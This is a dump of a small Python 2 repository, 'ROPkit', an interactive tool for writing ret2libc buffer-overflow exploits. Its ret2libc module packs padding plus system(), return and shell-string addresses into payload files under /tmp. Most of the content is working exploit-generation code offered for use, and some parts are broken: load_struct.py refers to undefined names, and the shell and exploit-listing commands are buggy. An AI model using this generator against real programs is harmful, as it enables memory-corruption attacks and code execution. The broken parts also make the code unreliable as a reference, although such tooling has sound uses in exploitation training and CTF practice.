README.md
ROPkit v2.0.0
===

ROPkit is a security-oriented tool created for help write exploits for Buffer-Overflow

### Dependencies 
Python 2.7.x

Git 

#### Building from source
`$ git clone https://github.com/non0c/ROPkit` 

After, change directory and run the `installer` as root's priviliges.

`# cd /path/to/ropkit/ && python installer.py` 

Once finished, execute with: 

`$ ROPkit` 

#### Modules
```
[Modules]
---------


(Exploitation methods):
-----------------------

	[ /exp-met/ret2libc ]	Exploit vulnerabilites using libc functions   09/09/18
```

--- 

Demonstration of "bofkit": 

[![asciicast](https://asciinema.org/a/WH6st6ceGFGYNpq53yVPhIhTE.png)](https://asciinema.org/a/WH6st6ceGFGYNpq53yVPhIhTE)

---


CHANGES.md
ropkit v2.0.0 - 22-10-18
- Major		: This program is now modulable
- Modules	: Add the "ret2libc" module

core/main.py
#! /usr/bin/env python
# -*- coding: utf-8 -*-

"""

main.py: Main 

Version: 1.0.0
Author: wil.tor	
License: https://opensource.org/licenses/GPL-3.0

"""

import os
import sys
import time
import readline

# Colors ...
W = '\033[0m'   # white
R = '\033[31m'  # red
O = '\033[33m'  # orange
G = '\033[32m'  # green		
B = '\033[34m'  # blue
C = '\033[36m'  # cyan
RB = '\033[1;31m'
LC = '\033[1;36m' 

VERSION = "2.0.0 @ linux-x86-64"
ASSISTANCE = R+"Type in this command. If you require assistance, type 'help'\n"+W
MODULE_NUMBER = 1

header = C+""" ____   ___  ____  _    _ _   
|  _ \ / _ \|  _ \| | _(_) |_ 
| |_) | | | | |_) | |/ / | __|
|  _ <| |_| |  __/|   <| | |_ 
|_| \_\\___/|_|   |_|\_\_|\__|
""" + W + "\nTool for write exploits for " + G + "Buffer-Overlfow\n\n"+W

middle = LC+"        [" + O + "   ROPkit version" +W+ LC + ":  2.0.0  	]"+ """
	[   Written by: wilt00x 	]
	[   Modules availables: %d	]\n\n
"""%MODULE_NUMBER + ASSISTANCE

R_M = C+"[*]"+W
F_M = RB+"[-]"+W

RR_M = C+"*"+W
RF_M = RB+"*"+W

SHELL = W+"(rkit)"
	
WARN       = F_M+" Unknown command: "
WARN_VAR   = F_M+" Unknown variable: "+W
WARN_INT   = "\n"+R_M+" Interruption: Type 'quit'."
WARN_INT_MODULE = "\n"+R_M+" Interruption: Type 'exit'."

EXPLOIT_FILE = "/tmp/ropkit-session-exploit-directory/exploit-"
EXPLOIT_DIRECTORY = "/tmp/ropkit-session-exploit-directory/"

def help_struct():
	print(W+"\n[Commands]")
	print("----------\n\n")
	print(W+"\n(Informations):")
	print("---------------\n") 
	sys.stdout.write(G+"	[ show modules ]"+W)
	sys.stdout.write("		Show the availables modules\n") 
	sys.stdout.write(G+"	[ show commands ]"+W)         
	sys.stdout.write("		Show the availables commands\n")
	sys.stdout.write(G+"	[ show version ]"+W)             
	sys.stdout.write("		Show the latest version of rkit\n")
	print(W+"\n(Other):")
	print("--------\n") 
	sys.stdout.write(G+"  	[ set ]"+W)                
	sys.stdout.write("	  		Set variable(s)\n")
	sys.stdout.write(G+"	[ quit ]"+W)             
	sys.stdout.write("		Quit the program\n")
	sys.stdout.write(G+"	[ clear ]"+W)             
	sys.stdout.write("		Clear the screen\n\n")




structure/load_struct.py
# -*- coding: utf-8 -*-

"""

load_module.py : Module

Version: 1.0.0
Author: wil.tor	
License: https://opensource.org/licenses/GPL-3.0

"""

from core import *
import struct 

def load_module():
	global set_option
	if os.path.isfile(PATH_SET) is not True:
		print WARN_LOAD
	else: 
		file = open(PATH_SET, "r")
		file_value = file.read()

		if file_value == "":
			print WARN_FSET
		else: 
			exploit="a"*1
			file_tokenized = file_value.split(":")
			for opt in set_options[2:]:
				for nb, tok in enumerate(file_tokenized[2:]): 
					if tok == opt: 
						if tok == set_options[3]:
							exploit="a"*int(file_tokenized[nb+3])
			inc=0
			if os.path.exists(PATH_ADD):
				inc+=1
				add_file = open(PATH_ADD, "r")
				add_content = add_file.read()

			save_file = open(PATH_EXPLOIT, "a+")
			save_file.write(exploit);
			print(R_M+" Exploit file is loaded at '/tmp/exploit.bkf'")
			if inc == 1:save_file.write(add_content)


modules/ret2libc_module.py
# -*- coding: utf-8 -*-
"""

ret2libc_module.py : Module

Version: 1.0.0
Author: wil.tor	
License: https://opensource.org/licenses/GPL-3.0

"""

from core import *
from struct import pack

def rettolibc_module_write(padding, system_addr, shell_addr, ret_addr, inc):
	if padding == "": 
		print(F_M+" Set 'padding' for write your exploit.")
	else:
		payload = 'a'*int(str(padding))
		payload += pack('<Q', int(str(system_addr), 16))
		payload += pack('<Q', int(str(ret_addr), 16))
		payload += pack('<Q', int(str(shell_addr), 16))

		if os.path.exists(EXPLOIT_FILE+str(inc)+".rkit"):
			while(os.path.exists(EXPLOIT_FILE+str(inc)+".rkit") == True):
				inc+=1
			exploit_file = open(EXPLOIT_FILE+str(inc)+".rkit", "a+")
			exploit_file.write(payload)

		elif os.path.exists(EXPLOIT_DIRECTORY):
			exploit_file = open(EXPLOIT_FILE+str(inc)+".rkit", "a+")
			exploit_file.write(payload)
		else:
			os.makedirs(EXPLOIT_DIRECTORY)
			exploit_file = open(EXPLOIT_FILE+str(inc)+".rkit", "a+")
			exploit_file.write(payload)

		print(R_M+" Exploit is loaded at '%s"%EXPLOIT_FILE+str(inc)+".rkit'")

def rettolibc_reset_exploit_file(inc, dltall): 
	if dltall == False:
		if os.path.exists(EXPLOIT_FILE+str(inc)+".rkit") is not True:
			print(F_M+" 'exploit-%s' doesn't exist."%inc)
		else:
			os.remove(EXPLOIT_FILE+str(inc)+".rkit")
			print(R_M+" reset: '%s"%EXPLOIT_FILE+str(inc)+".rkit'")
	else:
		todlt=os.listdir(EXPLOIT_DIRECTORY)

		if not(todlt):
			print(F_M+" There is no exploit to reset.")
		for i in range(0,len(todlt)):
				os.remove(EXPLOIT_DIRECTORY+'/'+todlt[i])
		for files in todlt: 
			print(R_M+" reset: '%s'"%files)

def rettolibc_show_exploit(inc):
	list_exploit=os.listdir(EXPLOIT_DIRECTORY)

	if not(list_exploit):
		print(F_M+" There is no exploit(s).")
	else:
		print(R_M+" exploits list: \n")
		i=0
		while(i<len(list_exploit)): 
			i+=1
		if any(str("exploit-"+str(i)+".rkit") in s for s in list_exploit):
			print(R_M+" Written: \n")
			for k in range(0, len(list_exploit)):
				print(RF_M+" '"+str(list_exploit[k])+"'")
			print("\n"+R_M+" Currently: \n")
			print(RR_M+" 'exploit-"+str(int(i+1))+".rkit'\n")
		else:
			print(str(EXPLOIT_FILE+str(int(i+1))+".rkit"))
			print(list_exploit)



def rettolibc_module():
	# Availables variables ###
	inc = 0
	padding = 0

	shell_address = 0x0
	system_address = 0x0
	return_address = 0x0
	### END: Availables variables #

	### Tmp variables ### 
	p=0
	sh_a=0
	sys_a=0
	ret_a=0
	### END: Tmp variables #

	while True:
		try:
			command = raw_input(SHELL+"(ret2libc) "+RB+">> "+W)
			tokenized = command.split(" ")

			if tokenized[0] == "exit":
				break
			elif tokenized[0] == "clear" or tokenized[0] == "cls":
				os.system("clear")
				continue
			elif tokenized[0] == "help": 
				help_struct()
				continue
			elif tokenized[0] == "reset":
				if tokenized[1] != "": 
					if tokenized[1] == "all" or tokenized[1] == "*":
						rettolibc_reset_exploit_file(inc, True)
						continue 
					else:
						rettolibc_reset_exploit_file(tokenized[1], False)
						continue
					continue
				else:
					print(F_M+" Specify the associated number to exploit to delete it.")
					continue
				continue
			elif tokenized[0] == "sh" or tokenized[0] == "bash" or tokenized[0] == "fish": 
				print(R_M+" open shell: '%s'."%tokenized[0])
				system(tokenized[0])
				continue
			elif tokenized[0] == "show": 
				if tokenized[1] == "commands": 
					print(W+"\n[Commands]")
					print("----------\n")
					print(W+"\n(Core):")
					print("-------\n") 
					sys.stdout.write(G+"	[ write ]"+W)
					sys.stdout.write("	Write your exploit in '/tmp/ropkit-session-exploit-directory/'\n")
					sys.stdout.write(G+"	[ reset ]"+W)
					sys.stdout.write("	Reset your exploit in '/tmp/ropkit-session-exploit-directory/'\n")
					print(W+"\n(Informations):")
					print("---------------\n")
					sys.stdout.write(G+"	[ show exploit ]"+W)
					sys.stdout.write("		Show exploit(s) informations\n")
					sys.stdout.write(G+"	[ show set-variables ]"+W)
					sys.stdout.write("		Show availables variables to set\n")
					sys.stdout.write(G+"	[ show advanced-set-variables ]"+W)
					sys.stdout.write("	Show availables advanced variables to set\n\n")
					continue
				elif tokenized[1] == "modules": 
					print(F_M+" For look others modules, quit with 'quit'.")
					continue
				elif tokenized[1] == "exploit": 
					rettolibc_show_exploit(inc) 
					continue
				elif tokenized[1] == "set-variables" or tokenized[1] == "s-v":
					print(R_M+" Availables variables: padding")
					continue
				elif tokenized[1] == "advanced-set-variables" or tokenized[1] == "a-s-v": 
					print(R_M+" Availables advanced variables: padding; SystemAddress; ReturnAddress; ShellAddress")
					continue
				else: 
					print(F_M+" Unknown option: "+tokenized[1]+".")
					continue
			elif tokenized[0] == "set": 
				if tokenized[1] == "padding": 
					if not tokenized[2] is None and tokenized[2] != "":
						if int(str(tokenized[2])) > 5000:
							print(F_M+" Give me a value included in [0;5000]")
							continue
						else:
							print(R_M+" set: "+tokenized[1]+ " ==> "+tokenized[2])
							padding = int(str(tokenized[2])); p+=padding; continue
						continue
					else: 
						print(F_M+" Assign a value to variable: "+tokenized[1]+".")
						continue 
				elif tokenized[1] == "SystemAddress" or tokenized[1] == "ReturnAddress" or tokenized[1] == "ShellAddress":
					if not tokenized[2] is None: 
						if len(str(tokenized[2])) > 18: 
							print(F_M+" Give me an address between 0 and 16 characters")
							continue
						else: 
							print(R_M+" set: "+tokenized[1]+" ==> "+tokenized[2])

							if tokenized[1] == "SystemAddress": 
								system_address = str(tokenized[2])
								sys_a+=int(str(system_address), 16); continue 
							elif tokenized[1] == "ReturnAddress": 
								return_address = str(tokenized[2])
								ret_a+=int(str(return_address), 16); continue
							elif tokenized[1] == "ShellAddress": 
								shell_address = str(tokenized[2])
								sh_a+=int(str(shell_address), 16); continue 
							continue
					else:
						print(F_M+" Assign a value to advanced variable: "+tokenized[1]+".")
						continue
				else: 
					print(F_M+" Unknown variable: "+tokenized[1]+".")
					continue
			elif tokenized[0] == "write": 
				inc+=1
				rettolibc_module_write(padding, system_address, shell_address, return_address, inc)
			else: 
				print(WARN+tokenized[0]+".")
				continue

		except (KeyboardInterrupt, EOFError): 
			print WARN_INT_MODULE
		except IndexError: 
			print(F_M+" Specify an option or a value for command: "+tokenized[0]+".")
			continue